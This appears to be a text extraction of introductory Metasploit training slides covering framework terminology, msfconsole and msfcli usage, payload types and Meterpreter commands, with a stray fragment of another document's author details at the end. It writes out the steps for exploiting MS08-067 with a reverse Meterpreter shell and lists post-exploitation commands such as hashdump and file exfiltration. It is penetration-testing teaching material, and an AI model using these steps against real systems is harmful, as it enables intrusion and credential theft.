Metasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space

Size: px

Start display at page:

Download "Metasploit Unleashed. Class 1: Metasploit Fundamentals. Georgia Weidman Director of Cyberwarface, Reverse Space"

Peter Evans
5 years ago
Views:

1 Metasploit Unleashed Class 1: Metasploit Fundamentals Georgia Weidman Director of Cyberwarface, Reverse Space

2 Acknowledgments Metasploit Team Offensive Security/Metasploit Unleashed Hackers for Charity Reverse Space

3 What is Metasploit Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more

4 Installing Metasploit Use Backtrack Windows: Installer includes all dependencies Linux: Follow documentation for dependencies Mac: Update Ruby and install

5 Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxillary: other modules besides exploitation Session: connection from a successful exploit

6 An Example Traditional Pentest: Find public exploit Change offsets and return address for your target Replace shellcode Metasploit: Load Metasploit module Select target OS Set IP addresses Select payload

7 Interacting with Metasploit Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage

8 Using Msfconsole: Commands help -shows help connect like netcat load/unload/loadpath load/unload modules route routes subnet traffic through a session irb drops you into a Ruby interpreter jobs show/terminate running jobs

9 Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit runs the selected module

10 Exploitation Example Search windows/smb Info windows/smb/ms08_067_netapi Use windows/smb/ms08_067_netapi Show payloads set payload=windows/meterpreter/reverse_tcp Show options Set lhost (set other options as well) Exploit

11 Using Msfcli./msfcli <exploit> <option=x> X Example: msfcli windows/smb/ms08_067_netapi RHOST= LHOST= PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads

12 Payload Types Inline - single payload with full shellcode Staged stager calls home to get more shellcode Meterpreter advanced, memory contained payload PassiveX ActiveX based, communicates via HTTP

13 Payload Type NoNX designed to circumvent DEP Ord staged payloads, don't require return address Ipv6 - built to function over IPv6 Reflective DLL Injection staged payload injected into memory process (ex. Meterpreter)

14 Generating Payloads Useful for fixing a public exploit (replacing shellcode) Select a payload (use x) generate -b <bad chars> -o <options> -t <output type> Example: use windows/shell/bind_tcp Generate -o LPORT= t raw

15 Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra

16 Meterpreter: commands help shows all available commands background backgrounds the session ps shows all processes migrate <process id> moves meterpreter to another process Getuid shows the user

17 Meterpreter: commands Download <file> - pulls a file from the victim Upload <file on attacker> <file on victim> - pushes a file to the victim Hashdump dumps the hashes from the sam Shell drops you in a shell

18 Exercises In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on your Windows XP machine. Experiment with different payloads and meterpreter commands.

AUTHOR CONTACT DETAILS

AUTHOR CONTACT DETAILS Name Dinesh Shetty Organization Paladion Networks Email ID dinesh.shetty@paladion.net Penetration Testing with Metasploit Framework When i say "Penetration Testing tool" the first